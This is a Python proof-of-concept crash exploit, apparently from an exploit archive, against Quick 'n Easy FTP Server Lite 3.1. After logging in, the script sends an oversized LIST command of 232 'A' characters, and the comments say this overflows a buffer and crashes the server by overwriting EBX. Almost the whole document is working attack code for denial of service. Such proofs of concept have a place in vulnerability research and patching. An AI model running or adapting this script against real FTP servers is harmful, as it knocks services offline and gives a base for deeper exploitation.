1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
#!/usr/bin/python print "\n############################################################" print "## Team Hackers Garage ##" print "## Quick 'n Easy FTP Server Lite Version 3.1 ##" print "## Crash PoC ##" print "## Sumit Sharma (aka b0nd) ##" print "## sumit.iips@gmail.com ##" print "## ##" print "## Special Thanks to: Double_Zero ##" print "## (http://www.exploit-db.com/author/DouBle_Zer0)##" print "## & ##" print "## corelanc0d3r (CORELAN TEAM) ##" print "## ##" print "############################################################" # Summary: The "LIST" command in Version 3.1 of Quick 'n Easy FTP Server Lite is vulnerable # Tested on: Windows XP SP2 # ftp> ls AAAA... 232 A's...AAA? # Server Crash! # Only EBX gets overwritten at the time of crash with the string following first 232 A's (in case using longer string). # No SEH overwrite # No EIP overwrite from socket import * host = "172.12.128.4" # Virtual Windows XP SP2 port = 21 user = "test" # "upload" and "download" access password = "test" s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) print s.recv(1024) s.send("user %s\r\n" % (user)) print s.recv(1024) s.send("pass %s\r\n" % (password)) print s.recv(1024) buffer = "LIST " buffer += "A" * 232 buffer += "?" buffer += "\r\n" s.send(buffer) print s.recv(1024) s.close() print "---->>> Server Crash!!!" |